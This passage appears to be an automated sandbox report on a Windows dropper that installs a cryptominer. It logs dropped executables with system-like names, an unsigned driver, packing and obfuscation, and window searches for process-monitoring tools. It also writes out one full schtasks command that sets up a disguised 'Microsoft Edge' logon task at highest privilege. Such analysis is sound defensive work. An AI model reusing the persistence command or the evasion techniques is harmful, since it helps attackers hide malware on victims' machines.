Source: C:\Windows\System32\services64.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\services64.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\services64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\services64.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\services64.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static file information: File size 1862656 > 1048576

Source: file.exe

Static PE information: Raw size of nataabbx is bigger than: 0x100000 < 0x195200

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: miner2.0.exe.82.dr	Static PE information: real checksum: 0x0 should be: 0x18d41
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
Source: svchost64.exe.85.dr	Static PE information: real checksum: 0x0 should be: 0x9e48
Source: services64.exe.107.dr	Static PE information: real checksum: 0x0 should be: 0x18d41
Source: file.exe	Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
Source: sihost64.exe.139.dr	Static PE information: real checksum: 0x0 should be: 0xcc5b

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: nataabbx
Source: file.exe	Static PE information: section name: ijueevze
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: nataabbx
Source: axplong.exe.0.dr	Static PE information: section name: ijueevze
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: .xdata
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /4
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /19
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /31
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /45
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /57
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /70
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /81
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /92
Source: loader_5879465914.exe.6.dr	Static PE information: section name: .xdata
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /4
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /19
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /31
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /45
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /57
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /70
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /81
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /92
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: .xdata
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /4
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /19
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /31
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /45
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /57
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /70
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /81
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C3D84C push ecx; ret	6_2_00C3D85F
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Code function: 85_2_00007FFD9BAC00BD pushad ; iretd	85_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 107_2_00007FFD9BAC01BD push E95E5098h; ret	107_2_00007FFD9BAC0259
Source: C:\Windows\System32\services64.exe	Code function: 114_2_00007FFD9BAD00BD pushad ; iretd	114_2_00007FFD9BAD00C1
Source: C:\Windows\System32\services64.exe	Code function: 122_2_00007FFD9BAA00BD pushad ; iretd	122_2_00007FFD9BAA00C1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA01BD push E95E5298h; ret	139_2_00007FFD9BAA0259
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC01BD push E95E5098h; ret	144_2_00007FFD9BAC0259
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA901BD push E95E5398h; ret	149_2_00007FFD9BA90259
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD01BD push E95E4F98h; ret	159_2_00007FFD9BAD0259

Source: file.exe	Static PE information: section name: entropy: 7.9826212288436125
Source: file.exe	Static PE information: section name: nataabbx entropy: 7.954246533814316
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.9826212288436125
Source: axplong.exe.0.dr	Static PE information: section name: nataabbx entropy: 7.954246533814316
Source: miner2.0.exe.82.dr	Static PE information: section name: .text entropy: 7.899470281638457
Source: svchost64.exe.85.dr	Static PE information: section name: .text entropy: 7.409218062568192
Source: services64.exe.107.dr	Static PE information: section name: .text entropy: 7.899470281638457

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Executable created and started: C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Executable created and started: C:\Windows\system32\Microsoft\Libs\sihost64.exe

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Drops PE files

Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	File created: C:\Users\user\AppData\Local\Temp\svchost64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\services64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	File created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\services64.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cscript.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f

Creates job files (autostart)

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
